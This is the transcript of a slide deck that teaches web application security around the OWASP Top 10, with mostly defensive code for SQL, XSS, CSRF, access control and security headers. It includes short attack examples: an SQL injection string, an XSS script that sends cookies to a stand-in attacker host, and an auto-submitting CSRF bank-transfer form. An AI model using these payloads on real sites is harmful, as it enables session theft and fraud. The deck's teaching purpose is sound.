Application Security around OWASP Top 10
-
Upload
sastry-tumuluri -
Category
Software
-
view
115 -
download
3
Transcript of Application Security around OWASP Top 10
WARNING
This is an awareness document.
There are more than 10 issues.
You cannot secure an application based on a top ten list.
$NEW_EMAIL = Request['new_email'];
update users set email='$NEW_EMAIL' where id=132005;
SQL Injection
1. WHAT IF: $NEW_EMAIL = ';
2. update users set email='$NEW_EMAIL' where id=132005;
3. update users set email=''; --' where id=132005;
SQL Injection
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”);
$stmt->bindParam(':new_email', $email);$stmt->bindParam(':user_id', $id);
Query Parameterization(PHP PDO)
SqlConnection objConnection = new SqlConnection(_ConnectionString);objConnection.Open(); SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection);objCommand.Parameters.Add("@Name", NameTextBox.Text); objCommand.Parameters.Add("@Password", PassTextBox.Text);SqlDataReader objReader = objCommand.ExecuteReader();
Query Parameterization(.NET)
String newName = request.getParameter("newName");String id = request.getParameter("id");
//SQLPreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id); //HQLQuery safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id);
Query Parameterization(Java)
# Create Project.create!(:name => 'owasp') # Read Project.all(:conditions => "name = ?", name) Project.all(:conditions => { :name => name }) Project.where("name = :name", :name => name) Project.where(:id=> params[:id]).all # Update Project.update_attributes(:name => 'owasp')
Query Parameterization Failure(RoR)
Disable Browser Autocomplete<form AUTOCOMPLETE="off"><input AUTOCOMPLETE="off">
Only send passwords over HTTPS POSTDo not display passwords in browserInput type=password
Store password based on needUse a salt (de-duplication)SCRYPT/PBKDF2 (slow, performance hit, easy)HMAC (requires good key storage, tough)
[2][2]Password Defenses
1) Do not limit the type of characters or length* of user password
•) Limiting passwords to protect against injection is doomed to failure
•) Use proper encoder and other defenses described instead
Password Storage
2) Use a Cryptographically strong credential-specific salt
•) Protect ([salt] + [password]);
•) Use a 32 char / 64 char salt (may depend on protection function)
•) Do not depend on hiding / splitting / otherwise obscuring the salt
Password Storage
3) Impose difficult verification on attacker ONLY
•) HMAC-SHA256 ([private key], [salt] + [password])
•) Protect the key as any private key
•) Store key outside the credential store (
•) Improvement over (solely) salted schemes; relies on proper key creation & management
Password Storage
4) Impose difficult verification on both(impacts attacker more than defender)
•) pbkdf2([salt] + [password], c=10,000,000);
•) PBKDF2 when FIPS certification or enterprise support on many platforms required
•) Scrypt when resisting hardware accelerated attacks is more important
Password Storage
Basic MFA Considerations
17
• Where do you send the token?– Email (worst – yet, better than none!)– SMS (ok)–Mobile native app (good)– Dedicated token (great)– Printed Tokens (interesting)
• How do you handle thick clients?– Email services, for example– Dedicated and strong per-app passwords
Basic MFA Considerations
18
• How do you handle unavailable MFA devices?– Printed back-up codes– Fallback mechanism (like email)– Call-in center
• How do you handle mobile apps?–When is MFA not useful in mobile app scenarios?
“Forgot Password” design
Require identity questions Last name, account number, email, DOBEnforce lockout policy
Ask one or more good security questionshttps://www.owasp.org/index.php/Choosing_and_Using_Security_Ques
tions_Cheat_Sheet
Send the user a randomly generated token via out-of-bandemail, SMS or hardware / software token generator
Verify code in same web sessionEnforce lockout policy
Change passwordEnforce password policy
<script >var badURL = ‘https://evileviljim.com/somesite/data=‘ + document.cookie;var img = new Image();img.src = badURL;
</script>
<script>document.body.innerHTML=‘<blink>CYBER IS COOL</blink>’;</script>
Anatomy of an XSS Attack
Impact of XSS
– Session Hijacking– Site Defacement–Network Scanning–Undermining CSRF Defenses– Site Redirection/Phishing– Load of Remotely Hosted Scripts–Data Theft–Keystroke Logging–Attackers using XSS more frequently
XSS Prevention (.NET)
• WebForms/WebForms View Engine <%=Server.HtmlEncode(data)%>
• WebForms v4.0+ <%data%>
• MVC3+ Razor View Engine @data
• Data Binding in Web Forms v4 and below<%#Server.HtmlEncode(Eval(“property”))%>
• Data Binding in v4.5 <%#Item.Property%>
• Better: ASP.Net 3.5 and below use AntiXss library directlyMicrosoft.Security.Application.Encoder.HtmlEncode(message)
XSS Prevention (.NET)
• ASP.Net 4 (WebForms and MVC) <httpRuntime encoderType=“Microsoft.Security.Application.AntiXssEncoder,AntiXssLibrary”/>
• ASP.Net 4.5 (AntiXss included in this version!)<httpRuntime encoderType=”System.WebSecurity.AntiXssEncoder, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a”/>
• JSON(MVC) Json.Encode(Model)
• Javascript encoding using AntiXssEncoder.JavaScriptEncode(Model.FirstName)
• No third party libraries or configuration necessary• This code was designed for high-availability/high-
performance encoding functionality• Simple drop-in encoding functionality• Performance, ESAPI integration• More complete API (uri and uri component encoding,
etc) in some regards• Java 1.5+• Last updated January 30, 2014 (version 1.1.1)
https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
OWASP Java Encoder Project
Web Page built in Java JSP is vulnerable to XSSWeb Page built in Java JSP is vulnerable to XSS
OWASP Java Encoder Project
Problem
Solution
1) <input type="text" name="data" value="<%= Encode.forHtmlAttribute(dataValue) %>" />
2) <textarea name="text"><%= Encode.forHtmlContent(textValue) %>" />
3) <button onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');">click me</button>
4) <script type="text/javascript">var msg = "<%= Encode.forJavaScriptBlock(message) %>";alert(msg);</script>
HTML ContextsEncode#forHtmlContent(String) Encode#forHtmlAttribute(String) Encode#forHtmlUnquotedAttribute(String)
XML ContextsEncode#forXml(String) Encode#forXmlContent(String) Encode#forXmlAttribute(String) Encode#forXmlComment(String) Encode#forCDATA(String)
CSS ContextsEncode#forCssString(String)Encode#forCssUrl(String)
JavaScript ContextsEncode#forJavaScript(String) Encode#forJavaScriptAttribute(String)Encode#forJavaScriptBlock(String)Encode#forJavaScriptSource(String)
URI/URL contextsEncode#forUri(String)Encode#forUriComponent(String)
OWASP Java Encoder Project
<script src="/my-server-side-generated-script">
class MyServerSideGeneratedScript extends HttpServlet { void doGet(blah) {
response.setContentType("text/javascript; charset=UTF-8");
PrintWriter w = response.getWriter(); w.println("function() {");
w.println(" alert('" + Encode.forJavaScriptSource(theTextToAlert) + "');");
w.println("}"); }
}
<script src="/my-server-side-generated-script">
class MyServerSideGeneratedScript extends HttpServlet { void doGet(blah) {
response.setContentType("text/javascript; charset=UTF-8");
PrintWriter w = response.getWriter(); w.println("function() {");
w.println(" alert('" + Encode.forJavaScriptSource(theTextToAlert) + "');");
w.println("}"); }
}
OWASP Java Encoder Project
Other Encoding Libraries
• Ruby on Rails– http://api.rubyonrails.org/classes/ERB/Util.html
• Reform Project – Java, .NET v1/v2, PHP, Python, Perl, JavaScript, Classic ASP– https://www.owasp.org/index.php/Category:OWASP_Encodin
g_Project
• ESAPI– PHP.NET, Python, Classic ASP, Cold Fusion– https://www.owasp.org/index.php/Category:OWASP_Enterpri
se_Security_API
• .NET AntiXSS Library– http://wpl.codeplex.com/releases/view/80289
• Writte in Java; lets you include HTML authored by third-parties in your web application while protecting against XSS
• Has an extensive test suite, and has undergone adversarial security review https://code.google.com/p/owasp-java-html-sanitizer/wiki/AttackReviewGroundRules
• Very easy to use
• Allows for simple programmatic POSITIVE policy configuration. No XML config.
• << Caja project (Google) High performance & low memory utilization
OWASP HTML Sanitizer Projecthttps://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
Web Page is vulnerable to XSS because of untrusted HTMLWeb Page is vulnerable to XSS because of untrusted HTML
PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .build();String safeHTML = policy.sanitize(untrustedHTML);
PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .build();String safeHTML = policy.sanitize(untrustedHTML);
Solving real world problems(using OWASP HTML Sanitizer)
Problem
Solution
• Pure JavaScript– http://code.google.com/p/google-caja/wiki/JsHtmlSanitizer
• Python– https://pypi.python.org/pypi/bleach
• PHP– http://htmlpurifier.org/– http://www.bioinformatics.org/phplabware/internal_utilities/htm
Lawed/
• .NET– AntiXSS.getSafeHTML/getSafeHTMLFragment– http://htmlagilitypack.codeplex.com/
• Ruby on Rails– http://api.rubyonrails.org/classes/HTML.html
Other HTML Sanitizers
• JavaScript encode and delimit untrusted data as quoted strings
• Avoid use of HTML rendering methods like innerHTML– If you must do this, then sanitize untrusted HTML first
• Avoid code execution contexts– eval(), setTimeout() or event handlers
• When possible, treat untrusted data as display text only• To build dynamic interfaces, usedocument.createElement("…"), element.setAttribute("…","value"), element.appendChild(…)
• Parse JSON with JSON.parse in the browser
DOM-based XSS Defense
SAFE use of JQuery
$(‘#element’).text(UNTRUSTED DATA);
UNSAFE use of JQuery
$(‘#element’).html(UNTRUSTED DATA);
40
Using fiddler an attacker can change the id and access more information
Insecure Direct Object Reference
41
We need to change the method signature (the ID is now a GUID), then translate it back to the original, direct reference before going any further:
public Customer GetCustomer(Guid indirectId) { var customerId = IndirectReferenceMap.GetDirectReference(indirectId); }
Insecure Direct Object Reference
[5][5]Security Misconfiguration
Is it really the developers' work? Or the sysadmins?
If the developers don't know, how will the application security design be complete?
What about configuring in Dev & Testing environments?
• Harden the Operating System– BIOS & grub passwords; secure physical access– Use multiple partitions (not default install); use options like
ro, nosuid,noexec,nodev --make-runbindable ...– Remove all unnecessary packages & drivers (e.g., do you
really need Xorg? All those fonts?)– Lockdown others (cron, USB detect, IPv6, ctrl-alt-del, – SSH password-less login with SSH keygen– Enable ufw / iptables / … and a HIDS >> turn on remote
logging– Oh yeah, regular patches & updates (wait!)– Regular backups!
Hardening the servers (general)
• Run Tomcat under a Security Manager– http://tomcat.apache.org/tomcat-6.0-doc/security-manage
r-howto.html– Modify $CATALINA_BASE/conf/catalina.policy
PropertyPermission, RuntimePermission, FilePermission, SocketPermission, NetPermission, ReflectPermission, …
– Configure package access (careful! test & debug!)
$CATALINA_BASE/conf/catalina.properties
– Restart Tomcat
$CATALINA_HOME/bin/catalina.sh start -security (Unix)
%CATALINA_HOME%\bin\catalina start -security (Windows)
Secure Config Tips (Tomcat)
• More tips– http://www.tomcatexpert.com/blog/2011/11/02/best-
practices-securing-apache-tomcat-7– Use Security LifeCycle Listener– Lockdown connector interfaces– Disable shutdown port?– Secure your Web Manager– Configure AccessLogValve and RemoteAddrValve
Secure Config Tips (Tomcat)
• Similar principles as Tomcat– Use the Java Security Manager– Configure policies and access permissions– Use Security Realms– Disable remote access to JMX– Configure TLS (SSL?) carefully
remove old protos, weak crypto, renego, legacy support, etc.– Secure the Management interfaces (disable HTTP mgmt?)– ...
Secure Config Tips (JBOSS)
5 things to remember here :
• Error Handling (Enable Custom Errors)
• Disable TRACE
Securing web.config
• Steps :– Go to “C:\Windows\Microsoft.NET\Framework\v4.0.30319” using command prompt.aspnet_regiis.exe -pe "connectionStrings" “<path of Web.Config>”
• Decrypting the web.config– Go to the same pathaspnet_regiis.exe -pd "connectionStrings" “<path of Web.Config>”
Encrypting web.config
• Before Encrypting
Referenceshttp://www.owasp.orghttp://www.codeproject.com/Tips/795135/Encrypt-ConnectionString-in-Web-Config
[8][8]
<img src="https://google.com/logo.png">
<img src="https://google.com/deleteMail/7/confirm=true">
<form method="POST" action="https://mybank.com/transfer"><input type="hidden" name="account" value="23532632"/><input type="hidden" name="amount" value="1000"/>
</form><script>document.forms[0].submit()</script>
Cross Site Request Forgery
57
How many are already “logged in”?Waiting to update your status, accept your credit card or email your friendsWhat if another tab manages to send a request?
What about others with the “remember me” checkbox?No need for tab to be open... just send a request and they'll happily accept!
How many tabs on your browser?
62
To add the anti-forgery tokens to a Razor page, use the HtmlHelper.AntiForgeryToken helper method:
@using (Html.BeginForm("Manage", "Account")) { @Html.AntiForgeryToken() }
This method adds the hidden form field and also sets the cookie token.
<script> @functions{ public string TokenHeaderValue() { string cookieToken, formToken; AntiForgery.GetTokens(null, out cookieToken, out formToken); return cookieToken + ":" + formToken;
}} $.ajax("api/values", { type: "post", contentType: "application/json", data: { }, // JSON data goes here dataType: "json", headers: { 'RequestVerificationToken': '@TokenHeaderValue()' } }); </script>
Anti-Forgery Tokens
63
void ValidateRequestHeader
(HttpRequestMessage request)
{ string cookieToken = ""; string formToken = ""; IEnumerable<string> tokenHeaders;
if (request.Headers.TryGetValues("RequestVerificationToken", out tokenHeaders))
{ string[] tokens = tokenHeaders.First().Split(':');
if (tokens.Length == 2) { cookieToken = tokens[0].Trim(); formToken = tokens[1].Trim(); }
} AntiForgery.Validate(cookieToken, formToken); }
if ((user.isManager() ||
user.isAdministrator() ||
user.isEditor()) &&
(user.id() != 1132)) {
//execute action
}
How do you change the policy of this code?
[7][7] Access Control
• Authorization: The process where a system determineswhether a specific user has access to a resource
• Permission: Represents app behavior only
• Entitlement: What a user is actually allowed to do
• Principle/User: Who/what you are entitling
• Implicit Role: Named permission, user associated– if (user.isRole(“Manager”));
• Explicit Role: Named permission, resource associated– if (user.isAuthorized(“report:view:3324”);
What is Access Control
• Hard-coded role checks in application code
• Lack of centralized access control logic
• Untrusted data driving access control decisions
• Access control that is “open by default”
• Lack of addressing horizontal access control in a standardized way (if at all)
• Access control logic that needs to be manually added to every endpoint in code
• Access Control that is “sticky” per session
• Access Control that requires per-user policy
Access Control DON'Ts
• Vertical Access Control Attacks– A standard user accessing administration
functionality
• Horizontal Access Control Attacks– Same role, but accessing another user's private
data
• Business Logic Access Control Attacks– Abuse of one or more linked activities that
collectively realize a business objective
Attacks on Access Control
• Loss of accountability– Attackers maliciously execute actions as other
users– Attackers maliciously execute higher level
actions
• Disclosure of confidential data– Compromising admin-level accounts often
results in access to user’s confidential data
• Data tampering– Privilege levels do not distinguish users who can
only view data and users permitted to modify data
Impact of poor Access Control
• Apache Shiro is a powerful and easy to use Java security framework
• Offers developers an intuitive yet comprehensive solution to authentication, authorization, cryptography, and session management
• Built on sound interface-driven design and OO principles
• Enables custom behavior
• Sensible and secure defaults for everything
Apache SHIRO
http://shiro.apache.org/
Web Application needs secure access control mechanismWeb Application needs secure access control mechanism
if ( currentUser.isPermitted( "lightsaber:wield" ) ) { log.info("You may use a lightsaber ring. Use it wisely.");} else { log.info("Sorry, lightsaber rings are for schwartz masters only.");}
if ( currentUser.isPermitted( "lightsaber:wield" ) ) { log.info("You may use a lightsaber ring. Use it wisely.");} else { log.info("Sorry, lightsaber rings are for schwartz masters only.");}
Problem
Solution
Solving real world Access Control problems
int winnebagoId = request.getInt("winnebago_id");
if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) { log.info("You are permitted to 'drive' the 'winnebago’. Here are the keys.");} else { log.info("Sorry, you aren't allowed to drive this winnebago!");}
int winnebagoId = request.getInt("winnebago_id");
if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) { log.info("You are permitted to 'drive' the 'winnebago’. Here are the keys.");} else { log.info("Sorry, you aren't allowed to drive this winnebago!");}
Solving real world Access Control problems
Web Application needs secure access to a specific objectWeb Application needs secure access to a specific object
Problem
Solution
“GET” exposes sensitive authentication information in the URLIn Web Server and Proxy Server logsIn the http referer header In Bookmarks/Favorites often emailed to others
“POST” places information in the body of the request and not the URL
Enforce HTTPS POST For Sensitive Data Transport73
HTTP: POST vs GET[E1]
» X-Frame-Options» X-XSS-Protection» X-Content-Type-Options » Content Security Policy» Access-Control-Allow-Origin» HTTPS Strict Transport Security» Cache-Control / Pragma
HTTP Response Headers(security related)
Protects you from most classes of Clickjacking
X-Frame-Options: DENYX-Frame-Options: SAMEORIGINX-Frame-Options: ALLOW FROM
X-Frame-Options
X-XSS-Protection
Use the browser’s built in XSS Auditor
X-XSS-Protection: [0-1](; mode=block)?
X-XSS-Protection: 1; mode=block
Fixes mime sniffing attacks
Only applies to IE
X-Content-Type-Options = ‘nosniff’
X-ContentType-Options
• Anti-XSS W3C standard http://www.w3.org/TR/CSP/
• Move all inline script and style into external files
• Add the X-Content-Security-Policy response header to instruct the browser that CSP is in use
• Define a policy for the site regarding loading of content
• Chrome version 25 and later (50%)• Firefox version 23 and later (30%)• Internet Explorer version 10 and later (10%)
Content Security Policy
Add the following as part of your HTTP Response
Cache-Control: no-store, no-cache, must-revalidateExpires: -1
Disabling the browser cache
[E2][E2]Application Layer Intrusion Detection
• Great detection points to start with– Input validation failure server side when client side
validation exists– Input validation failure server side on non-user editable
parameters(hidden fields, checkboxes, radio buttons or select lists)
– Forced browsing to common attack entry points e.g., /admin/secretlogin.jsp or honeypot URL (a fake path listed in /robots.txt)
Application LayerIntrusion Detection
• Others–Blatant SQLi or XSS injection attacks–Workflow sequence abuse (e.g. multi-part
form in wrong order)–Custom business logic (e.g. basket vs
catalogue price mismatch)
OWASP AppSensor (Java)
• Project and mailing list https://www.owasp.org/index.php/OWASP_AppSensor_Project
• Four-page briefing, Crosstalk, Journal of Defense Software Engineering
• http://www.crosstalkonline.org/storage/issue-archives/2011/201109/201109-Watson.pdf
[E3][E3]Encryption in transit
• Confidentiality, Integrity (in Transit) and Authenticity– Authentication credentials and session identifiers must be encrypted in
transit via HTTPS/SSL– Starting when the login form is rendered until logout is complete
• HTTPS configuration best practices– https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sh
eet
• HSTS (Strict Transport Security)– http://www.youtube.com/watch?v=zEV3HOuM_Vw – Strict-Transport-Security: max-age=31536000
• Certificate Pinning– https://www.owasp.org/index.php/Pinning_Cheat_Sheet
Strict-transport-security: max-age=10000000
Do all of your subdomains support SSL?
Strict-transport-security: max-age=10000000; includeSubdomains
Strict Transport Security (HSTS)
protected void Application_BeginRequest(Object sender, EventArgs e){ switch (Request.Url.Scheme) { case "https": Response.AddHeader("Strict-Transport-Security", "max-age=31536000"); break; case "http": var path = "https://" + Request.Url.Host + Request.Url.PathAndQuery; Response.Status = "301 Moved Permanently"; Response.AddHeader("Location", path); break; }} // in global.asax
• What is Pinning– Pinning is a key continuity scheme – Detect when an imposter with a fake but CA validated
certificate attempts to act like the real server• 2 Types of pinning• Carry around a copy of the server’s public key;
– Great if you are distributing a dedicated client-server application since you know the server’s certificate or public key in advance
• Note of the server’s public key on first use (Trust-on-First-Use, Tofu)– Useful when no a priori knowledge exists, such as SSH or a
Browser• https://www.owasp.org/index.php/Pinning_Cheat_Sheet
Certificate Pinning
File Upload Security
• Upload Verification– Filename and Size validation + antivirus
• Upload Storage– Use only trusted filenames + separate domain
• Beware of "special" files – "crossdomain.xml" or "clientaccesspolicy.xml".
• Image Upload Verification – Enforce proper image size limits– Use image rewriting libraries– Set the extension of the stored image to be a valid image extension– Ensure the detected content type of the image is safe
• Generic Upload Verification – Ensure decompressed size of file < maximum size – Ensure that an uploaded archive matches the type expected (zip, rar)– Ensure structured uploads such as an add-on follow proper standard
[E4][E4]